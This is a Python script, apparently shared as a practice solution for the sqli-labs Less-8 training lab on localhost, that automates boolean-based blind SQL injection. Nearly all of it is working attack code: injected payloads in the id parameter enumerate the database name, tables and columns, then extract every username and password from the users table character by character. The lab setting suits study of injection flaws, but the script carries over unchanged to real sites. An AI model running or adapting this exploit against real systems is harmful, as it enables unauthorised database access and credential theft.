[大数据]sqli-labs_less8布尔盲注脚本

import requests
import string

url='http://127.0.0.1/sqli/Less-8/'

i=0
db_name_len=0
print('[+]正在猜解数据库长度......')
while True:
    payload=url+"?id=1'and length(database())=%d--+"%i
    res=requests.get(payload)
    #print(payload)
    if 'You are in...........' in res.text:
        db_name_len=i
        print ('数据库长度为:'+str(db_name_len))
        break
    if i==30:
        print('error!')
        break
    i+=1

print("[+]正在猜解数据库名字......")
db_name=''
for i in range(1,db_name_len+1):
    #print(i)
    for k in string.ascii_lowercase:
        #print(k)
        payload=url+"?id=1'and substr(database(),%d,1)='%s'--+"%(i,k)
        res=requests.get(payload)
        #print(payload)
        if 'You are in...........' in res.text:
            db_name+=k
            #print(db_name)
            break
print("数据库为: %s"%db_name)

#猜解几张表
print("[+]正在猜解表的数量......")
tab_num=0
while True:
    payload=url+"?id=1'and (select count(table_name) from information_schema.tables where table_schema='security')=%d--+"%tab_num
    res=requests.get(payload)
    if 'You are in...........' in res.text:
        print("%s数据库共有"%db_name+str(tab_num)+"张表")
        break
    else:
        tab_num+=1

print("[+]开始猜解表名......")
for i in range(1,tab_num+1):
    tab_len=0
    while True:
        payload=url+"?id=1'and (select length(table_name) from information_schema.tables where table_schema='security' limit %d,1)=%d--+"%(i-1,tab_len)
        res=requests.get(payload)
        #print(payload)
        if 'You are in...........' in res.text:
            #print ('第%d张表长度为:'%i+str(tab_len))
            break
        if tab_len==30:
            print('error!')
            break
        tab_len+=1
    tab_name=''
    for j in range(1,tab_len+1):
        for m in string.ascii_lowercase:
            payload=url+"?id=1'and substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1)='%s'--+"%(i-1,j,m)
            res=requests.get(payload)
            if 'You are in...........' in res.text:
                tab_name+=m
                #print (tab_name)
    print("[-]第%d张表名为: %s"%(i,tab_name))
    #尝试猜解表下字段......
    dump_num=0
    while True:
        payload=url+"?id=1'and (select count(column_name) from information_schema.columns where table_name='%s')=%d--+"%(tab_name,dump_num)
        res=requests.get(payload)
        if 'You are in...........' in res.text:
            print("%s表下有%d个字段"%(tab_name,dump_num))
            break
        dump_num+=1
    
    for a in range(1,dump_num+1):
        dump_len=0
        while True:
            payload=url+"?id=1'and (select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d--+"%(tab_name,a-1,dump_len)      
            res=requests.get(payload)
            #print(payload)
            if 'You are in...........' in res.text:
                #print("第%d个字段长度为%d"%(a,dump_len))
                break
            dump_len+=1
            if dump_len==30:
                print("error!!")
                break
        dump_name=''
        for i in range(1,dump_len+1):
            for j in (string.ascii_lowercase+'_-'):
                payload=url+"?id=1'and substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1)='%s'--+"%(tab_name,a-1,i,j)
                res=requests.get(payload)
                if 'You are in...........' in res.text:
                    dump_name+=j
                    #print(dump_name)
                    break
        print(dump_name)
print("[+]开始猜解users表下的username......")
usn_num=0
char="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-"
while True:
    payload=url+"?id=1'and (select count(username) from security.users)=%d--+"%usn_num
    res=requests.get(payload)
    if "You are in" in res.text:
        #print(usn_num)#13
        break
    usn_num+=1
for i in range(1,usn_num+1):
    usn_len=0
    while True:
        payload=url+"?id=1'and (select length(username) from security.users limit %d,1)=%d--+"%(i-1,usn_len)
        res=requests.get(payload)
        if "You are in" in res.text:
            #print("第%d的长度为%d"%(i,usn_len))
            break
        usn_len+=1
    usr_name=''
    for k in range(1,usn_len+1):
        for m in char:
            payload=url+"?id=1'and substr((select username from security.users limit %d,1),%d,1)='%s'--+"%(i-1,k,m)
            res = requests.get(payload)
            if "You are in" in res.text:
                usr_name+=m
                break
    print(usr_name)

print("[+]开始猜解users表下的password......")
usn_num=0
char="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-@!"
while True:
    payload=url+"?id=1'and (select count(password) from security.users)=%d--+"%usn_num
    res=requests.get(payload)
    if "You are in" in res.text:
        #print(usn_num)#13
        break
    usn_num+=1
for i in range(1,usn_num+1):
    usn_len=0
    while True:
        payload=url+"?id=1'and (select length(password) from security.users limit %d,1)=%d--+"%(i-1,usn_len)
        res=requests.get(payload)
        if "You are in" in res.text:
            #print("第%d的长度为%d"%(i,usn_len))
            break
        usn_len+=1
    usr_name=''
    for k in range(1,usn_len+1):
        for m in char:
            payload=url+"?id=1'and substr((select password from security.users limit %d,1),%d,1)='%s'--+"%(i-1,k,m)
            res = requests.get(payload)
            if "You are in" in res.text:
                usr_name+=m
                break
    print(usr_name)